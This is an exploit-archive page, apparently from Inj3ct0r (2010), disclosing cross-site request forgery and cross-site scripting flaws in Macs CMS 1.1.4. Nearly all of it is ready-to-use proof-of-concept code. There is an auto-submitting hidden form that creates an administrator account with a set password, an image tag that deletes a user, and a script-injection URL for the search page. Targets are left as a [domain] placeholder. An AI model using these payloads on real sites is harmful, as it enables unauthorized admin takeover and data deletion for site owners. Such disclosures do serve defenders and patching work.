Home / os / win7

Macs CMS 1.1.4 (XSS/CSRF) Vulnerabilities

Posted on 11 July 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Macs CMS 1.1.4 (XSS/CSRF) Vulnerabilities</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>========================================= Macs CMS 1.1.4 (XSS/CSRF) Vulnerabilities ========================================= &lt;!--- Title: Macs CMS 1.1.4 Multiple Vulnerabilities (XSS/CSRF) Author: 10n1z3d &lt;10n1z3d[at]w[dot]cn&gt; Date: Sun 11 Jul 2010 11:53:35 AM EEST Vendor: http://macs-framework.sourceforge.net/ Download: http://sourceforge.net/projects/macs-framework/ ---&gt; -=[ CSRF PoC 1 - Create Admin User ]=- &lt;html&gt; &lt;head&gt; &lt;title&gt;Macs CMS 1.1.4 Multiple Vulnerabilities (XSS/CSRF) - Create Admin User&lt;/title&gt; &lt;/head&gt; &lt;body onload=&quot;document.csrf.submit();&quot;&gt; &lt;!--- Edit these ---&gt; &lt;form name=&quot;csrf&quot; action=&quot;http://[domain]/index.php/main/cms/saveUser&quot; method=&quot;post&quot;&gt; &lt;input type=&quot;hidden&quot; name=&quot;ajaxRequest&quot; value=&quot;true&quot; /&gt; &lt;input type=&quot;hidden&quot; name=&quot;username&quot; value=&quot;root&quot; /&gt; &lt;input type=&quot;hidden&quot; name=&quot;password&quot; value=&quot;rootroot&quot;/&gt; &lt;input type=&quot;hidden&quot; name=&quot;confirmPassword&quot; value=&quot;rootroot&quot; /&gt; &lt;input type=&quot;hidden&quot; name=&quot;emailAddress&quot; value=&quot;root@root.com&quot; /&gt; &lt;!--- Do not edit below ---&gt; &lt;input type=&quot;hidden&quot; name=&quot;roleId&quot; value=&quot;1&quot; /&gt; &lt;/form&gt; &lt;/body&gt; &lt;/html&gt; -=[ CSRF PoC 2 - Delete User ]=- &lt;img src='http://[domain]/index.php/main/cms/deleteUser?userId=2' /&gt; -=[ XSS PoC ]=- http://[domain]/index.php/footer/search?searchString='&gt;&lt;script&gt;alert('xss')&lt;/script&gt; &lt;!--- http://www.evilzone.org/ irc.evilzone.org (6697 / 9999) ---&gt; # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-07-11]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP